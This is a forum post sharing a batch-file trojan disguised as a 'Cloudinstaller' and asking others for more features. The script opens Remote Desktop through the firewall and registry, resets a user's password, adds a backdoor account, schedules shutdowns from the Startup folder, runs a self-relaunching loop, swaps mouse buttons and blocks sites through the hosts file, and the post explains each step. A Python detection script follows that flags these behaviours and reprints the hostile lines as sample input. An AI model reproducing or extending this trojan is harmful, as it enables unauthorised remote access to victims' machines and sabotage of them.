Does anyone have an improvement for this trojan?

ja
1

I have programmed a "small" batch Trojan.

I can't think of any more orders. Does anyone have an idea what I could add?

By the way, the Trojan is called "Roemer" (inspired by "Trojan") and is "disguised" as a cloud installer.
(The Trojan is still being converted to .exe)

About the code: I often run "cd." because the "starter" (of the Trojan) may have put the Trojan in a folder, which is packed in another folder, etc.

@echo off

title Cloudinstaller V.0.6

set newline = ^ & echo.

cls

echo Run as admin! / Open as an admin!

pause> NUL

cls

echo Username / Username (Example: Timon)

set / P "HUH =>"

cls

netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes

reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

cd C: \ Users \% HUH% \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup

echo shutdown -s -t 60> Friendly.bat

net user% HUH% heiligeroemer

net user Roemer roman empire / add

echo start hoesmad.bat> hoesmad.bat

Rundll32 user32, SwapMouseButton

cd C: \ Users \% HUH% \ Desktop

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

cd windows

cd System32

cd drivers

cd etc

echo 127.0.0.1 http://www.netflix.com/...etflix.com >> hosts

echo 127.0.0.1 http://www.youtube.com/...outube.com >> hosts

echo 127.0.0.1 http://www.instagram.com/...tagram.com >> hosts

echo 127.0.0.1 http://www.twitter.com >> hosts

cls

echo process completed.

pause> NUL

Explanations: So netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes

and

reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

are there to activate or allow the "remote host connection".

Later I added a user so that I can get access to the user and then get access to the "main user".

If you know the person you "infected" personally, I have had the password changed.

Mouse buttons are changed.

There's an "infinite CPU overload"

Websites are blocked (btw, if someone knows the command to block programs or a command that closes when the program is opened, write me)

The "victim device" is shut down after 60 seconds.

Maybe I'll add the taskkill / F / Fi "status eq running" command, but the last one.

I thank you for the help.

Le

Scriptkiddie.
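
For anyone who finds a script like the one posted above on a machine, here is a small static triage pass that flags each behaviour the post describes. It is an added example, not part of the original thread; the rule names and the `triage` function are made up for illustration, and the sample lines are copied from the post with their spacing left as it appears there.

```python
import re

# (rule id, regex). Each regex runs against a line that has been lower-cased
# and stripped of ALL whitespace, so odd spacing cannot hide a command.
RULES = [
    ("rdp-firewall-opened", r"netshadvfirewall.*remotedesktop.*enable=yes"),
    ("rdp-enabled-in-registry", r"fdenytsconnections.*/d0(/|$)"),
    ("startup-folder-used", r"startmenu\\programs\\startup"),
    ("shutdown-scheduled", r"shutdown[-/]s[-/]t\d+"),
    ("local-account-added", r"^netuser.+/add$"),
    ("local-account-modified", r"^netuser(?!.*/add$).+"),
    ("self-relaunching-batch", r"^echostart(\S+\.bat)>>?\1$"),
    ("mouse-buttons-swapped", r"swapmousebutton"),
    ("hosts-file-redirect", r"^echo127\.0\.0\.1.+>>hosts$"),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]

def triage(script_text):
    """Return [(line_number, rule_id), ...] for every rule hit in a batch script."""
    hits = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        squeezed = re.sub(r"\s+", "", line).lower()
        for name, rx in COMPILED:
            if rx.search(squeezed):
                hits.append((number, name))
    return hits

# Sample input: lines copied as they appear in the post above (spacing included).
SAMPLE = r'''@echo off
title Cloudinstaller V.0.6
netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes
reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f
cd C: \ Users \% HUH% \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup
echo shutdown -s -t 60> Friendly.bat
net user% HUH% heiligeroemer
net user Roemer roman empire / add
echo start hoesmad.bat> hoesmad.bat
Rundll32 user32, SwapMouseButton
echo 127.0.0.1 http://www.twitter.com >> hosts
pause> NUL
'''

if __name__ == "__main__":
    for number, name in triage(SAMPLE):
        print(f"line {number}: {name}")
```

A hit on `rdp-enabled-in-registry` together with `local-account-added` is the combination to escalate first, since it means both a new login and a remote way to use it.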